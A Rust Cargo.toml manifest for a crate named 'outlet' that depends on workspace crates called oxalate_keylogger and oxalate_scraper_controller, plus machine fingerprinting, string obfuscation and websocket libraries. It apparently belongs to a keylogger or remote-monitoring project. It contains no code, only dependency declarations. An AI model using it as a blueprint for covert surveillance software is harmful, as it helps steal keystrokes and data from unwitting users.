[package]
name = "outlet"
version = "0.1.0"
edition = "2024"

[dependencies]
oxalate_keylogger = { workspace = true }
oxalate_schemas = { workspace = true }
oxalate_scraper_controller = { workspace = true }

tokio = { workspace = true }
machine-uid = "0.5.4"
muddy = "0.3.2"
once_cell = "1.21.3"
reqwest = { version = "0.12.24", features = ["json"] }
log.workspace = true
chrono = { workspace = true, features = ["serde"] }
serde = { workspace = true }
serde_json = { workspace = true }
tokio-tungstenite = "0.28.0"
futures-util = { workspace = true }
tokio-util = { version = "0.7.17", features = ["rt"] }
thiserror.workspace = true
async-scoped = { version = "0.9.0", features = ["use-tokio"] }
craftping = { version = "0.7.0", features = ["async-tokio"] }
systemstat = "0.2.5"
futures = { workspace = true }
fern = { workspace = true }
log_json_serializer = { workspace = true }
